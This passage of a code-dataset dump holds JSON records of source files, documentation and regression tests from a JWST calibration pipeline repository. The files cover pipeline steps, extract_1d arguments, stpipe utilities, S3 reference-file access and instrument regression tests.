}, { "alpha_fraction": 0.7036262154579163, "alphanum_fraction": 0.7071129679679871, "avg_line_length": 33.975608825683594, "blob_id": "5cc95bcbc5b77c279099ed98afd182fe1aced751", "content_id": "70d693754124844a9b8c349e411012265355e547", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 1434, "license_type": "permissive", "max_line_length": 60, "num_lines": 41, "path": "/jwst/pipeline/linear_pipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#\n# Simple linear pipeline\n\nfrom ..stpipe import LinearPipeline\n\nfrom ..ipc.ipc_step import IPCStep\nfrom ..dq_init.dq_init_step import DQInitStep\nfrom ..refpix.refpix_step import RefPixStep\nfrom ..saturation.saturation_step import SaturationStep\nfrom ..dark_current.dark_current_step import DarkCurrentStep\nfrom ..linearity.linearity_step import LinearityStep\nfrom ..jump.jump_step import JumpStep\nfrom ..ramp_fitting.ramp_fit_step import RampFitStep\nfrom ..assign_wcs.assign_wcs_step import AssignWcsStep\nfrom ..extract_2d.extract_2d_step import Extract2dStep\nfrom ..flatfield.flat_field_step import FlatFieldStep\nfrom ..persistence.persistence_step import PersistenceStep\nfrom ..straylight.straylight_step import StraylightStep\nfrom ..fringe.fringe_step import FringeStep\nfrom ..photom.photom_step import PhotomStep\n\n\nclass TestLinearPipeline(LinearPipeline):\n\n pipeline_steps = [\n ('ipc', IPCStep),\n ('dq_init', DQInitStep),\n ('refpix', RefPixStep),\n ('saturation', SaturationStep),\n ('dark_current', DarkCurrentStep),\n ('linearity', LinearityStep),\n ('jump', JumpStep),\n ('ramp_fit', RampFitStep),\n ('assign_wcs', AssignWcsStep),\n ('extract_2d', Extract2dStep),\n ('flat_field', FlatFieldStep),\n ('persistence', PersistenceStep),\n ('straylight', StraylightStep),\n ('fringe', FringeStep),\n ('photom', PhotomStep)\n ]\n" }, { "alpha_fraction": 0.7488080859184265, "alphanum_fraction": 0.75417160987854, "avg_line_length": 53.129032135009766, "blob_id": "26393a45e078c48d9da9c9fa6d4ba8e6f6c926a8", "content_id": "76ee2b7c2e653f7a66c8e1b433b96da091e4fa43", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3356, "license_type": "permissive", "max_line_length": 82, "num_lines": 62, "path": "/docs/jwst/extract_1d/arguments.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "Step Arguments\n==============\n\nThe ``extract_1d`` step has six step-specific arguments.\n\n``--smoothing_length``\n If ``smoothing_length`` is greater than 1 (and is an odd integer), the\n background will be smoothed in the dispersion direction with a boxcar of\n this width. If ``smoothing_length`` is None (the default), the step will\n attempt to read the value from the EXTRACT1D reference file. If a value was\n specified in the reference file, that will be used. Note that in this\n case a different value can be specified for each slit. If no value was\n specified either by the user or in the EXTRACT1D reference file, no background\n smoothing will be done.\n\n``--bkg_order``\n This is the order of a polynomial function to be fit to the background\n regions. The fit is done independently for each column (or row, if the\n dispersion is vertical) of the input image, and the fitted curve will be\n subtracted from the target data. ``bkg_order`` = 0 (the minimum allowed\n value) means to fit a constant. The user-supplied value (if any)\n overrides the value in the EXTRACT1D reference file. If neither is specified, a\n value of 0 will be used. If a sufficient number of valid data points is\n unavailable to construct the polynomial fit, the fit will be forced to\n 0 for that particular column (or row).\n\n``--log_increment``\n Most log messages are suppressed while looping over integrations, i.e. 
when\n the input is a CubeModel or a 3-D SlitModel. Messages will be logged while\n processing the first integration, but since they would be the same for\n every integration, most messages will only be written once. However, since\n there can be hundreds or thousands of integrations, which can take a long\n time to process, it would be useful to log a message every now and then to\n let the user know that the step is still running.\n\n ``log_increment`` is an integer, with default value 50. If it is greater\n than 0, an INFO message will be printed every ``log_increment``\n integrations, e.g. \"... 150 integrations done\".\n\n``--subtract_background``\n This is a boolean flag to specify whether the background should be\n subtracted. If None, the value in the EXTRACT1D reference file (if any)\n will be used. If not None, this parameter overrides the value in the\n reference file.\n\n``--use_source_posn``\n This is a boolean flag to specify whether the target and background extraction\n region locations specified in the EXTRACT1D reference file should be shifted\n to account for the expected position of the source. If None (the default),\n the step will make the decision of whether to use the source position based\n on the observing mode and the source type. The source position will only be\n used for point sources and for modes where the source could be located\n off-center due to things like nodding or dithering. If turned on, the sky\n (RA/Dec) position of the source is used in conjunction with the World\n Coordinate System (WCS) to compute the x/y source location. For long-slit\n type modes (e.g. MIRI LRS and NIRSpec fixed-slit and MOS), only the position\n in the cross-dispersion direction is used to potentially offset the\n extraction regions in that direction.\n\n``--apply_apcorr``\n Switch to select whether or not to apply an APERTURE correction during the\n Extract1dStep processing. Default is ``True``\n" }, { "alpha_fraction": 0.6746857166290283, "alphanum_fraction": 0.6785869002342224, "avg_line_length": 37.773109436035156, "blob_id": "ec7ddd8cfef55e316ecd83871333394b68fe8a0a", "content_id": "404789f9bd5376506ce73586c9d9bf5bd93e3e87", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4614, "license_type": "permissive", "max_line_length": 80, "num_lines": 119, "path": "/jwst/stpipe/utilities.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "# Copyright (C) 2010 Association of Universities for Research in Astronomy(AURA)\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n#\n# 3. The name of AURA and its representatives may not be used to\n# endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS\n# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\n# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\n# DAMAGE.\n\"\"\"\nUtilities\n\"\"\"\nimport inspect\nimport os\nimport sys\n\n\ndef import_class(full_name, subclassof=object, config_file=None):\n \"\"\"\n Import the Python class `full_name` given in full Python package format,\n e.g.::\n\n package.another_package.class_name\n\n Return the imported class. Optionally, if `subclassof` is not None\n and is a Python class, make sure that the imported class is a\n subclass of `subclassof`.\n \"\"\"\n # Understand which class we need to instantiate. The class name is given in\n # full Python package notation, e.g.\n # package.subPackage.subsubpackage.className\n # in the input parameter `full_name`. This means that\n # 1. We HAVE to be able to say\n # from package.subPackage.subsubpackage import className\n # 2. If `subclassof` is defined, the newly imported Python class MUST be a\n # subclass of `subclassof`, which HAS to be a Python class.\n\n if config_file is not None:\n sys.path.insert(0, os.path.dirname(config_file))\n\n try:\n full_name = full_name.strip()\n package_name, sep, class_name = full_name.rpartition('.')\n if not package_name:\n raise ImportError(\"{0} is not a Python class\".format(full_name))\n imported = __import__(\n package_name, globals(), locals(), [class_name, ], level=0)\n\n step_class = getattr(imported, class_name)\n\n if not isinstance(step_class, type):\n raise TypeError(\n 'Object {0} from package {1} is not a class'.format(\n class_name, package_name))\n elif not issubclass(step_class, subclassof):\n raise TypeError(\n 'Class {0} from package {1} is not a subclass of {2}'.format(\n class_name, package_name, subclassof.__name__))\n finally:\n if config_file is not None:\n del sys.path[0]\n\n return step_class\n\n\ndef get_spec_file_path(step_class):\n \"\"\"\n Given a Step (sub)class, divine and return the full path to the\n corresponding spec file. Use the fact that by convention, the spec\n file is in the same directory as the `step_class` source file. It\n has the name of the Step (sub)class and extension .spec.\n \"\"\"\n try:\n step_source_file = inspect.getfile(step_class)\n except TypeError:\n return None\n step_source_file = os.path.abspath(step_source_file)\n\n # Since `step_class` could be defined in a file called whatever,\n # we need the source file basedir and the class name.\n dir = os.path.dirname(step_source_file)\n return os.path.join(dir, step_class.__name__ + '.spec')\n\n\ndef find_spec_file(step_class):\n \"\"\"\n Return the full path of the given Step subclass `step_class`, if\n it exists or None if it does not.\n \"\"\"\n spec_file = get_spec_file_path(step_class)\n if spec_file is not None and os.path.exists(spec_file):\n return spec_file\n return None\n\n\ndef islist_tuple(obj):\n \"\"\"\n Return True if `obj` is either a list or a tuple. 
False otherwise.\n \"\"\"\n return isinstance(obj, tuple) or isinstance(obj, list)\n" }, { "alpha_fraction": 0.5986177325248718, "alphanum_fraction": 0.6018075346946716, "avg_line_length": 35.64285659790039, "blob_id": "43c96b917d6235c51a48705ca0003202123cfdc7", "content_id": "139fb62540027e8bff50251b4ee9308cbbe5fb15", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5643, "license_type": "permissive", "max_line_length": 80, "num_lines": 154, "path": "/jwst/stpipe/linear_pipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "# Copyright (C) 2010 Association of Universities for Research in Astronomy(AURA)\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n#\n# 3. The name of AURA and its representatives may not be used to\n# endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS\n# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\n# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\n# DAMAGE.\n\"\"\"\nLinearPipeline\n\n\"\"\"\nimport gc\n\nfrom .pipeline import Pipeline\n\n\nclass _LinearPipelineMetaclass(type):\n def __init__(cls, name, bases, dct):\n super(_LinearPipelineMetaclass, cls).__init__(name, bases, dct)\n pipeline_steps = cls.pipeline_steps\n if pipeline_steps is not None and len(pipeline_steps) == 0:\n raise ValueError(\n \"{0!r} LinearPipeline subclass defines no pipeline_steps\"\n .format(name))\n if pipeline_steps is None:\n pipeline_steps = []\n cls.step_defs = dict(pipeline_steps)\n\n# Since the pipeline_steps member needs to be converted to a step_defs\n# at the class level, we need to use a metaclass.\n\nclass LinearPipeline(Pipeline, metaclass=_LinearPipelineMetaclass):\n \"\"\"\n A LinearPipeline is a way of combining a number of steps together\n in a simple linear order.\n \"\"\"\n\n spec = \"\"\"\n # start_step and end_step allow only a part of the pipeline to run\n start_step = string(default=None) # Start the pipeline at this step\n end_step = string(default=None) # End the pipeline right before this step\n\n # [steps] section is implicitly added by the Pipeline class.\n \"\"\"\n\n # To be overridden by subclasses\n pipeline_steps = None\n\n def _check_start_and_end_steps(self):\n \"\"\"\n Given the start_step and end_step members (which are strings\n or None), find the actual step objects they correspond to.\n \"\"\"\n start_step = end_step = None\n\n if self.start_step is 
not None:\n if hasattr(self, self.start_step):\n start_step = getattr(self, self.start_step)\n else:\n raise ValueError(\n \"start_step {0!r} not found\".format(\n self.start_step))\n\n if self.end_step is not None:\n if hasattr(self, self.end_step):\n end_step = getattr(self, self.end_step)\n else:\n raise ValueError(\n \"end_step {0!r} not found\".format(\n self.end_step))\n\n return start_step, end_step\n\n def process(self, input_file):\n \"\"\"\n Run the pipeline.\n \"\"\"\n self._check_start_and_end_steps()\n\n do_caching = (\n self.end_step is not None and\n self.end_step != self.pipeline_steps[-1][0])\n\n if self.start_step is None:\n mode = 'RUN'\n else:\n mode = 'BEFORE'\n\n # It would be easiest to do this in a loop,\n # but we use recursion instead to make the \"with\" statements\n # work correctly\n\n def recurse(mode, input_file, pipeline_steps):\n gc.collect()\n if pipeline_steps == []:\n if (hasattr(self, 'output_file') and\n self.output_file is not None):\n input_file.save(self.output_file)\n return input_file\n\n name, cls = pipeline_steps[0]\n step = getattr(self, name)\n filename = '{0}.fits'.format(self.qualified_name)\n if name == self.start_step:\n mode = 'RUN'\n\n if mode == 'BEFORE':\n from .. import datamodels\n\n try:\n with datamodels.open(filename) as dm:\n pass\n except (ValueError, TypeError, IOError):\n return recurse(mode, filename, pipeline_steps[1:])\n else:\n dm = datamodels.open(filename)\n return recurse(mode, dm, pipeline_steps[1:])\n\n elif mode == 'RUN':\n dm = step(input_file)\n if do_caching:\n dm.save(filename)\n if name == self.end_step:\n return None\n return recurse(mode, dm, pipeline_steps[1:])\n\n result = recurse(mode, input_file, self.pipeline_steps)\n gc.collect()\n return result\n\n def set_input_filename(self, path):\n for name, cls in self.pipeline_steps:\n getattr(self, name).set_input_filename(path)\n" }, { "alpha_fraction": 0.531974196434021, "alphanum_fraction": 0.5745219588279724, "avg_line_length": 34.89545440673828, "blob_id": "806979a90e0dfb2965aeec1b39c80e7edcc6e9e5", "content_id": "66fc0a575e3b8b623dde8aa1b349b6d710ac7d85", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7897, "license_type": "permissive", "max_line_length": 100, "num_lines": 220, "path": "/jwst/tests_nightly/general/nircam/test_nircam_steps_single.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import os\nimport glob\n\nimport pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\nfrom ci_watson.artifactory_helpers import get_bigdata\n\nfrom jwst.ramp_fitting import RampFitStep\nfrom jwst.wfs_combine import WfsCombineStep\nfrom jwst.pipeline import Detector1Pipeline\nfrom jwst.lib.set_telescope_pointing import add_wcs\nfrom jwst.lib import engdb_tools\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\n\nfrom jwst.stpipe import Step\n\n\[email protected]\nclass TestWFSImage2(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_datasets', 'sdp_jw82600_wfs', 'level2a', 'truth']\n test_dir = 'test_datasets'\n\n def test_wfs_image2(self):\n \"\"\"\n Regression test of the WFS&C `calwebb_wfs-image2.cfg` pipeline\n \"\"\"\n data_base = 'jw82600026001_02101_00001_nrca1_rate'\n ext = '.fits'\n input_name = '{}{}'.format(data_base, ext)\n input_file = self.get_data(self.test_dir, 'sdp_jw82600_wfs', 'level2a',\n input_name)\n\n collect_pipeline_cfgs('cfgs')\n Step.from_cmdline([os.path.join('cfgs', 'calwebb_wfs-image2.cfg'), 
input_file])\n\n cal_name = input_name.replace('rate', 'cal')\n output_name = input_name.replace('rate','cal_ref')\n outputs = [(cal_name, output_name)]\n self.compare_outputs(outputs)\n\n output_files = glob.glob('*')\n output_files.remove('cfgs')\n\n # these would happen when docopy=True\n if input_name in output_files:\n output_files.remove(input_name)\n if output_name in output_files:\n output_files.remove(output_name)\n if \"truth\" in output_files:\n output_files.remove(\"truth\")\n\n assert cal_name in output_files\n output_files.remove(cal_name)\n assert not output_files, 'Unexpected output files {}'.format(output_files)\n\n\[email protected]\nclass TestDetector1Pipeline(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_detector1pipeline', 'truth']\n test_dir = 'test_detector1pipeline'\n\n def test_detector1pipeline3(self):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on NIRCam data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw82500001003_02101_00001_NRCALONG_uncal.fits')\n step = Detector1Pipeline()\n step.save_calibrated_ramp = True\n step.ipc.skip = True\n step.refpix.odd_even_columns = True\n step.refpix.use_side_ref_pixels = False\n step.refpix.side_smoothing_length = 10\n step.refpix.side_gain = 1.0\n step.persistence.skip = True\n step.jump.rejection_threshold = 250.0\n step.ramp_fit.save_opt = True\n step.output_file = 'jw82500001003_02101_00001_NRCALONG_rate.fits'\n step.run(input_file)\n\n outputs = [('jw82500001003_02101_00001_NRCALONG_ramp.fits',\n 'jw82500001003_02101_00001_NRCALONG_ramp_ref.fits'),\n ('jw82500001003_02101_00001_NRCALONG_rate.fits',\n 'jw82500001003_02101_00001_NRCALONG_rate_ref.fits'),\n ('jw82500001003_02101_00001_NRCALONG_rateints.fits',\n 'jw82500001003_02101_00001_NRCALONG_rateints_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRCamRamp(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_ramp_fit', 'truth']\n test_dir = 'test_ramp_fit'\n\n def test_ramp_fit_nircam(self):\n \"\"\"\n Regression test of ramp_fit step performed on NIRCam data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00017001001_01101_00001_NRCA1_jump.fits')\n\n result, result_int = RampFitStep.call(input_file,\n save_opt=True,\n opt_name='rampfit_opt_out.fits'\n )\n\n optout_file = 'rampfit_opt_out_fitopt.fits'\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00017001001_01101_00001_NRCA1_ramp_fit.fits'),\n (optout_file,\n 'rampfit_opt_out.fits',\n ['primary','slope','sigslope','yint','sigyint','pedestal','weights','crmag']) ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestWFSCombine(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_wfs_combine', 'truth']\n test_dir = 'test_wfs_combine'\n\n def test_wfs_combine(self):\n \"\"\"\n Regression test of wfs_combine using do_refine=False (default)\n Association table has 3 (identical) pairs of input files to combine\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n 'wfs_3sets_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n WfsCombineStep.call(asn_file)\n\n outputs = [('test_wfscom_wfscmb.fits',\n 'test_wfscom.fits'),\n ('test_wfscoma_wfscmb.fits',\n 'test_wfscoma.fits'),\n ('test_wfscomb_wfscmb.fits',\n 'test_wfscomb.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_wfs_combine1(self):\n \"\"\"\n Regression test of wfs_combine using do_refine=True\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n 
'wfs_3sets_asn2.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n WfsCombineStep.call(asn_file,\n do_refine=True )\n\n outputs = [('test_wfscom2_wfscmb.fits',\n 'test_wfscom_do_ref.fits'),\n ('test_wfscom2a_wfscmb.fits',\n 'test_wfscoma_do_ref.fits'),\n ('test_wfscom2b_wfscmb.fits',\n 'test_wfscomb_do_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_wfs_combine2(self):\n \"\"\"\n Regression test of wfs_combine using do_refine=True\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n 'wfs_3sets_asn3.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n WfsCombineStep.call(asn_file,\n do_refine=True)\n\n outputs = [('test_wfscom3_wfscmb.fits',\n 'test_wfscom_do_ref.fits'),\n ('test_wfscom3a_wfscmb.fits',\n 'test_wfscoma_do_ref.fits'),\n ('test_wfscom3b_wfscmb.fits',\n 'test_wfscomb_do_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNrcGrismSetPointing(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_pointing', 'truth']\n test_dir = 'test_pointing'\n rtol = 0.000001\n\n def test_nircam_setpointing(self):\n \"\"\"\n Regression test of the set_telescope_pointing script on a level-1b NIRCam file.\n \"\"\"\n\n # Copy original version of file to test file, which will get overwritten by test\n input_file = self.get_data(self.test_dir,\n 'jw00721012001_03103_00001-seg001_nrcalong_uncal_orig.fits')\n\n # Get SIAF PRD database file\n siaf_prd_loc = ['jwst-pipeline', self.env, 'common', 'prd.db']\n siaf_path = get_bigdata(*siaf_prd_loc)\n\n # Call the WCS routine, using the ENGDB_Service\n add_wcs(input_file, siaf_path=siaf_path, engdb_url=engdb_tools.ENGDB_BASE_URL)\n\n outputs = [(input_file,\n 'jw00721012001_03103_00001-seg001_nrcalong_uncal_ref.fits')]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.4931895434856415, "alphanum_fraction": 0.6010215878486633, "avg_line_length": 39.04545593261719, "blob_id": "c5ca41515aeaa173c2f20f37b3046e1f39f286c1", "content_id": "dd9acf8ab0536d929adfa28e85b73f766fa7104e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1762, "license_type": "permissive", "max_line_length": 89, "num_lines": 44, "path": "/jwst/tests_nightly/general/fgs/test_fgs_sloper_1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline.calwebb_detector1 import Detector1Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\[email protected]\nclass TestSloperPipeline(BaseJWSTTest):\n input_loc = 'fgs'\n ref_loc = ['test_sloperpipeline', 'truth']\n\n def test_fgs_detector1_1(self):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on FGS imaging mode data.\n \"\"\"\n input_file = self.get_data('test_sloperpipeline',\n 'jw86500007001_02101_00001_GUIDER2_uncal.fits')\n pipe = Detector1Pipeline()\n pipe.ipc.skip = True\n pipe.refpix.odd_even_columns = True\n pipe.refpix.use_side_ref_pixels = True\n pipe.refpix.side_smoothing_length = 11\n pipe.refpix.side_gain = 1.0\n pipe.refpix.odd_even_rows = True\n pipe.jump.rejection_threshold = 250.0\n pipe.persistence.skip = True\n pipe.ramp_fit.save_opt = False\n pipe.save_calibrated_ramp = True\n pipe.output_file = 'jw86500007001_02101_00001_GUIDER2_rate.fits'\n\n pipe.run(input_file)\n\n outputs = [('jw86500007001_02101_00001_GUIDER2_ramp.fits',\n 'jw86500007001_02101_00001_GUIDER2_ramp_ref.fits',\n ['primary','sci','err','groupdq','pixeldq']),\n 
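# Note (added): 'rate' products are integration-averaged slope images; the\n                   # 'rateints' products keep the fitted slope for each integration.\n                   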
('jw86500007001_02101_00001_GUIDER2_rateints.fits',\n 'jw86500007001_02101_00001_GUIDER2_rateints_ref.fits',\n ['primary','sci','err','dq']),\n ('jw86500007001_02101_00001_GUIDER2_rate.fits',\n 'jw86500007001_02101_00001_GUIDER2_rate_ref.fits',\n ['primary','sci','err','dq'])\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.6291841268539429, "alphanum_fraction": 0.6830543875694275, "avg_line_length": 38.83333206176758, "blob_id": "1e5677bb024948ca4061e0ec6194c5055adff3c9", "content_id": "bbd4e3825ccbfadb09f239f6e7f3a7b52508f66e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1912, "license_type": "permissive", "max_line_length": 84, "num_lines": 48, "path": "/jwst/tests_nightly/general/nirspec/test_nrs_ifu_wcs.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom numpy.testing import assert_allclose\nfrom gwcs.wcstools import grid_from_bounding_box\nfrom ci_watson.artifactory_helpers import get_bigdata\n\nfrom jwst.assign_wcs import AssignWcsStep, nirspec\nfrom jwst.datamodels import ImageModel\n\n\ntestdata = [\n ('nrs1', 'jw00011001001_01120_00001_NRS1_rate.fits',\n 'jw00011001001_01120_00001_NRS1_assign_wcs.fits'),\n ('nrs1_opaque', 'jw00011001001_01120_00001_NRS1_rate_opaque.fits',\n 'jw00011001001_01120_00001_NRS1_rate_opaque_assign_wcs.fits'),\n ('nrs2', 'NRSIFU-COMBO-030_NRS2_SloperPipeline.fits',\n 'NRSIFU-COMBO-030_NRS2_SloperPipeline_assign_wcs.fits')\n]\n\[email protected]\[email protected](\"test_id, input_file, truth_file\", testdata)\ndef test_nirspec_ifu_wcs(envopt, _jail, test_id, input_file, truth_file):\n \"\"\"\n Regression test of creating a WCS object and doing pixel to sky transformation.\n \"\"\"\n del test_id\n\n input_file = get_bigdata('jwst-pipeline', envopt,\n 'nirspec', 'test_wcs', 'nrs1-ifu', input_file)\n truth_file = get_bigdata('jwst-pipeline', envopt,\n 'nirspec', 'test_wcs', 'nrs1-ifu', 'truth', truth_file)\n\n result = AssignWcsStep.call(input_file, save_results=True, suffix='assign_wcs')\n result.close()\n\n im = ImageModel(result.meta.filename)\n imref = ImageModel(truth_file)\n w = nirspec.nrs_wcs_set_input(im, 0)\n grid = grid_from_bounding_box(w.bounding_box)\n ra, dec, lam = w(*grid)\n wref = nirspec.nrs_wcs_set_input(imref, 0)\n raref, decref, lamref = wref(*grid)\n\n # equal_nan is used here as many of the entries are nan.\n # The domain is defined but it is only a few entries in there that are valid\n # as it is a curved narrow slit.\n assert_allclose(ra, raref, equal_nan=True)\n assert_allclose(dec, decref, equal_nan=True)\n assert_allclose(lam, lamref, equal_nan=True)\n" }, { "alpha_fraction": 0.5639787316322327, "alphanum_fraction": 0.5760502219200134, "avg_line_length": 18.913461685180664, "blob_id": "80729d0fce70584a8ba3144e76dc1e64e8b08792", "content_id": "c9f3a84dfa230e736f90c2c844412f16a20fe8cf", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2071, "license_type": "permissive", "max_line_length": 84, "num_lines": 104, "path": "/jwst/lib/s3_utils.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nExperimental support for reading reference files from S3. 
Use of these functions\nrequires installing the [aws] extras (but this module can be safely imported without\nthem).\n\"\"\"\nimport atexit\n\n\n__all__ = [\"object_exists\", \"get_object\", \"get_client\", \"is_s3_uri\", \"split_uri\"]\n\n\n_CLIENT = None\n\n\ndef object_exists(uri):\n \"\"\"\n Determine if an object exists on S3.\n\n Parameters\n ----------\n uri : str\n S3 URI (s3://bucket-name/some/key)\n\n Returns\n -------\n bool\n `True` if object exists, `False` if not.\n \"\"\"\n bucket_name, key = split_uri(uri)\n return get_client().object_exists(bucket_name, key)\n\n\ndef get_object(uri):\n \"\"\"\n Fetch the content of an object from S3.\n\n Parameters\n ----------\n uri : str\n S3 URI (s3://bucket-name/some/key)\n\n Returns\n -------\n io.BytesIO\n The content of the object.\n \"\"\"\n bucket_name, key = split_uri(uri)\n return get_client().get_object(bucket_name, key)\n\n\ndef get_client():\n \"\"\"\n Get the shared instance of ConcurrentS3Client.\n\n Returns\n -------\n stsci_aws_utils.s3.ConcurrentS3Client\n \"\"\"\n global _CLIENT\n if _CLIENT is None:\n from stsci_aws_utils.s3 import ConcurrentS3Client\n _CLIENT = ConcurrentS3Client()\n atexit.register(_CLIENT.close)\n return _CLIENT\n\n\ndef is_s3_uri(value):\n \"\"\"\n Determine if a value represents an S3 URI.\n\n Parameters\n ----------\n value : str\n Value to test.\n\n Returns\n -------\n bool\n `True` if value is an S3 URI, `False` if not.\n \"\"\"\n return value.startswith(\"s3://\")\n\n\ndef split_uri(uri):\n \"\"\"\n Split an S3 URI into bucket name and key components.\n\n Parameters\n ----------\n uri : str\n S3 URI (s3://bucket-name/some/key)\n\n Returns\n -------\n str\n Bucket name URI component\n str\n Key URI component\n \"\"\"\n if not uri.startswith(\"s3://\"):\n raise ValueError(\"Expected S3 URI\")\n\n bucket_name, key = uri.replace(\"s3://\", \"\").split(\"/\", 1)\n return bucket_name, key\n" }, { "alpha_fraction": 0.7050827145576477, "alphanum_fraction": 0.7068557739257812, "avg_line_length": 34.25, "blob_id": "214a0bc23910708954bcadb3311d7c039b753910", "content_id": "756af7349a7fc2d91dae6beddcc8c655a26cc0e5", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1692, "license_type": "permissive", "max_line_length": 106, "num_lines": 48, "path": "/jwst/regtest/test_fgs_guider.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Regression tests for FGS Guidestar in ID and FINEGUIDE modes\"\"\"\nimport os\n\nimport pytest\nfrom astropy.io.fits.diff import FITSDiff\n\nfrom jwst.lib.suffix import replace_suffix\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\n\ndef is_like_truth(rtdata, fitsdiff_default_kwargs, suffix, truth_path='truth/fgs/test_fgs_guider'):\n \"\"\"Compare step outputs with truth\"\"\"\n output = replace_suffix(\n os.path.splitext(os.path.basename(rtdata.input))[0], suffix\n ) + '.fits'\n rtdata.output = output\n\n rtdata.get_truth(os.path.join(truth_path, output))\n\n diff = FITSDiff(rtdata.output, rtdata.truth, 